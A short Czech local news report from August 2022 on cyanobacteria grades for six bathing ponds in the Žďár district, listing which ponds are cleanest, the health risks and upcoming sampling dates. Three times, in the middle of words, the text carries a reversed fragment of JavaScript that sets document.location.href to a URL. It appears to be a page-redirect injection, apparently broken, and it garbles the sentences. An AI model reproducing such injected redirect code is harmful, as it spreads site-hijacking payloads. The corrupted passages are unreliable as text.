Rainbow page separator

Dářko a Sykovec si stále drží jedničku, voda je bez sinic

Úterý, 2. srpna 2022

Žďársko / Velké Dářko a Sykovec. To jsou v současné době dva nejčistší rybníky z hygieniky celkem šesti sledovaných vodních nádrží ve žďárském okrese. Jak Dářko, tak Sykovec byly z celkem pětistupňové řady ohodnoceny jedničkou. Dvojku dostaly Medlov, Pilská nádrž a novoměstské Koupaliště, přičemž množství sinic ve všech třech nádržích od minulého rozboru pokleslo. Nejhorší kvalitu vody nyní vykazuje Domanínský rybník oznámkovaný trojkou. Obsahuje zvýšené množství sinic a chlorofylu, což představuje i zvýšenou pravděpodobnost vzniku zdravotních komplikací po koupání, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];to zejména u citlivých lidí. Nejčastějšími bývají střevní a žaludeční problémy, záněty uší a očí nebo vyrážka. Největší riziko vyvolané sinicemi při vodní rekreaci hrozí těhotným ženám, alergikům a osobám s oslabenou imuni[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou.
Další pravidelné odběry vody jsou podle moni[„\’///:ptth\’=ferh.noitacol.tnemucod“];torovacího kalendáře krajské hygienické stanice v plánu 8. srpna a 22. srpna. Opakované odběry mimo předem dané termíny se provádějí zejména v případech, když se kvalita vody v rybníku silně zhorší.